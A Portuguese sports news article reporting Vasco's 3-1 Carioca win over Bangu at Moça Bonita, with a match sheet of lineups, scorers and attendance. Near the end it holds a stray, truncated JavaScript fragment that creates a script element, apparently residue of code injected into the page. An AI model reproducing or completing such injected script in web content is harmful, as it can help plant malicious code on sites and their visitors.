Vasco despacha o Bangu por 3 x 1

Jogadores vascaínos vibram com a primeira vitória no Carioca deste ano. Foto: Paulo Fernandes/Vasco.com.br

O Vasco conquistou sua primeira vitória no Campeonato Carioca ao bater, por 3 x 1, o Bangu, nesta quinta-feira (2), em Moça Bonita. Com o resultado, os cruzmaltinos se recuperaram da derrota na estreia e chegaram aos primeiros pontos na Taça Guanabara, chegando à vice-liderança do Grupo C. Já o Bangu segue com apenas um ponto na competição.

A equipe de Cristóvão Borges mostrou mais organização, principalmente no meio, e abriu o placar com Guilherme, no primeiro tempo. O goleiro Jordi, ainda na etapa inicial, defendeu pênalti cobrado por Loco Abreu. Só que na etapa final, o uruguaio chegou ao gol número 400 na carreira e empatou o confronto. Pouco tempo depois, Thalles marcou para o Vasco e, já nos acréscimos, Nenê decretou a vitória com gol olímpico.

Na próxima rodada, o Vasco recebe o Resende, em São Januário, no domingo. O Bangu só entra em campo na segunda-feira, contra o Volta Redonda, na Cidade do Aço.

FICHA TÉCNICA
BANGU 1 X 3 VASCO

Local: Estádio Moça Bonita, no Rio de Janeiro (RJ)
Árbitro: João Batista de Arruda
Renda: R$ 84.240,00
Público: 4.194 pagantes
Gols: Guilherme, aos 38 minutos do primeiro tempo; Loco Abreu, aos 8; Thalles, aos 14;  e Nenê, aos 45 minutos do segundo tempo

BANGU: Márcio, Denilson, Leonardo Luiz, Anderson Penna e Guilherme; Damián Eroza (Marcos Vinícius), Raphael Augusto e Leandro Chaves; Bruno Luiz (Lorran), Loco Abreu e Luis Peralta (Matheus Pimeta)
Técnico: Eduardo Allax

VASCO: Jordi, Yago Pikachu, Luan, Rodrigo e Alan Cardoso (Andrezinho); Julio dos Santos (Bruno Gallo), Evander, Escudero, Guilherme (Ederson) e Nenê; Thalles
Técnico: Cristóvão Borges

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário